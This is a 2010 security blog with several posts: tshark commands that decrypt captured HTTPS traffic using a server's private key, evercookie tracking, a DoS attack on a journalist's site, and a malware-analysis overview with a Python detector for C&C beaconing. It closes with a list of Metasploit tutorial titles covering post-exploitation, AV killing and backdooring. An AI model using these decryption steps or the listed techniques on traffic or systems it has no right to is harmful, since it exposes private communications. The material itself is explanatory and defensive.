Tshark Fu: decrypting SSL streams

Nice article from Pauldotcom about decrypting SSL streams with tshark, focused on HTTPS servers.

The article is easy to follow and explains the full process as well as the problems they found. The following points were particularly interesting:

Convert the private key from PKCS#8 to PKCS#1
I understand that the private key must be in PKCS#1 because it is the only format understood by tshark.

openssl pkcs8 -in private.key -out rsa_private.key -nocrypt

This point is particularly confusing... I found the following entry in the Wireshark mailing list that explains this problem.

Tshark output and the HTTP parser

The following command decrypts the stream and parses the output with tshark's internal HTTP parser.

tshark -o "ssl.desegment_ssl_records: TRUE"  \
-o "ssl.desegment_ssl_application_data: TRUE" \
-o "ssl.keys_list:,443,http,rsa_private.key"  \
-o "ssl.debug_file:rsa_private.log" -r all.pcap  \
 -R "(tcp.port eq 443)" -V

This behavior can be changed if we want to read the raw data. This is achieved by modifying the third field of the ssl.keys_list entry, so we have data instead of http:

-o "ssl.keys_list:,443,data,rsa_private.key"

Thursday, October 14, 2010

Evercookies: evil user tracking

Many web browsers allow users to delete cookies, which makes tracking user behavior more difficult. But an evil mind thought that using other storage areas that are not meant for storing cookies could bypass these control mechanisms.

An evercookie is defined as:
Evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. 
evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

Jeremiah Grossman points in his article to an evercookie demo and to the attempts made by Dominic White to defeat this tracking system. Dominic comments that Firefox should be safe by default (?) but Safari not, and he created a shell script that deletes the temporary files.

Apparently, Jeremiah found a way to remove these cookies in Google Chrome using only the GUI. It is achieved by disabling the Silverlight and Flash storage settings.

Security websites attacked and public disclosure

Yes, gangs do not like their dirty laundry being made public, because they want to keep working anonymously and, of course, they tend to go mad when somebody researches their activities and practices public disclosure.

On September 23rd, Brian Krebs published a story called 'I’ll Take Two MasterCards and a Visa, Please' that appeared in mainstream websites and led to the takedown of the gang's website, which was used as a marketplace to sell stolen credit cards.

24 hours later, his website suffered a DoS attack with an average of 2.3 Gb, and at least one IP address that belongs to Microsoft was involved. As Krebs comments in his article Pill Gang Used Microsoft’s Network in Attack on KrebsOnSecurity.com, it turns out that many computers in Microsoft's net-block had been compromised for weeks and used to route traffic to pharmacy spam sites that belong to Russian gangs.

I found this paragraph particularly funny and ironic,
In just one of the many ironies in this story, the compromised server inside of Microsoft appears to have been running Linux, not one of Microsoft’s server technologies. According to Guilmette, all of the hacked servers used by this pill gang are Unix or Linux servers. This mode of operation matches that of “Bulker.biz,” a rogue pharmacy affiliate program known for promoting rogue “Canadian Health&Care Mall” pill sites — as well as a number of other brands — by hijacking poorly-secured Linux and Unix servers.

And the response from Microsoft:
Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.

Tuesday, October 12, 2010

A packet repository at the University of Twente

I have read on Richard Bejtlich's Twitter and on the Argus mailing list about the packet repository maintained by the University of Twente.

A quote from the wiki page:
From this location you can download anonymized packet headers (tcpdump/libcap), Netflow version 5 data and a Labeled Dataset for Intrusion Detection. Data is taken from various locations in the Netherlands. More information on the data collection and anonymization procedures can be found here.

Quick introduction to malware analysis

This post from Lenny Zeltser on the SANS Forensics Blog introduces the whole process of malware analysis.

The post can be summarized with the following points:

  • Behavioral analysis (dynamic analysis). Helps understand how the malware interacts with local and remote systems by running it in a controlled environment.
  • Code analysis (static analysis). Disassemble the binary and analyze the malware at the assembly level with the help of a debugger.
  • Memory analysis. This method is related to behavioral analysis because the investigator dumps the contents of memory for further examination. This helps spot hidden code as well as better understand how the malware behaves.

I also would add network analysis because it helps to understand how the local system interacts with remote systems, like a C&C server. Many times the investigator must examine malware that was found on a live system, and having a network capture may be handy.
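As an added illustration of the network-analysis point (example code written for this post, not from Lenny's article or any tool it names), the following Python takes a constructed flow summary from a host under analysis and picks out endpoints contacted at regular intervals, the sleep-and-poll pattern a C&C channel often shows. The addresses, timestamps and thresholds are all made up for the example.

```python
"""Spot periodic C&C-style beaconing in a flow summary (constructed sample data)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: (epoch seconds, dst_ip, dst_port, bytes) seen from one host.
# 203.0.113.7 is polled every ~60 s; the other two are ordinary, irregular traffic.
SAMPLE_FLOWS = [
    (1000, "203.0.113.7", 443, 512), (1060, "203.0.113.7", 443, 498),
    (1121, "203.0.113.7", 443, 520), (1180, "203.0.113.7", 443, 505),
    (1240, "203.0.113.7", 443, 511), (1300, "203.0.113.7", 443, 499),
    (1003, "198.51.100.20", 80, 4000), (1090, "198.51.100.20", 80, 1200),
    (1350, "198.51.100.20", 80, 23000), (1015, "192.0.2.9", 53, 80),
]


def beacon_candidates(flows, min_flows=5, max_jitter=0.2):
    """Group flows by (dst, port) and report endpoints contacted at regular intervals.

    jitter = stdev(intervals) / mean(intervals): human-driven browsing has high
    jitter, a sleep-and-poll implant has low jitter. Thresholds are illustrative.
    """
    by_dst = defaultdict(list)
    for ts, dst, port, _size in flows:
        by_dst[(dst, port)].append(ts)

    result = []
    for (dst, port), times in by_dst.items():
        if len(times) < min_flows:          # too few contacts to call it periodic
            continue
        times.sort()
        intervals = [b - a for a, b in zip(times, times[1:])]
        avg = mean(intervals)
        if avg == 0:                        # burst at one instant, not a beacon
            continue
        jitter = pstdev(intervals) / avg
        if jitter <= max_jitter:
            result.append({"dst": dst, "port": port, "count": len(times),
                           "period_s": round(avg, 1), "jitter": round(jitter, 3)})
    return result


if __name__ == "__main__":
    for hit in beacon_candidates(SAMPLE_FLOWS):
        print(f"{hit['dst']}:{hit['port']} contacted {hit['count']} times, "
              f"period {hit['period_s']}s, jitter {hit['jitter']}")
```

On a real capture, the flow tuples would come from a tool such as Argus or tcpdump output rather than the inline list.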

Metasploit megaprimer: 300 minutes of video tutorials

Awesome post on ethicalhacker.net with more than 300 minutes of video tutorials. I link to the original resources instead of the URL shortening service that appears in the post.

1. Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1
2. Metasploit Megaprimer (Getting Started with Metasploit) Part 2
3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)
4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)
5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)
6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)
7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)
8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)
9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)
10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)
11. Metasploit Megaprimer (Post Exploitation and Stealing Data) Part 11
12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)
13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)
14. Metasploit Megaprimer Part 14 (Backdooring Executables)
15. Metasploit Megaprimer Part 15 (Auxiliary Modules)
16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)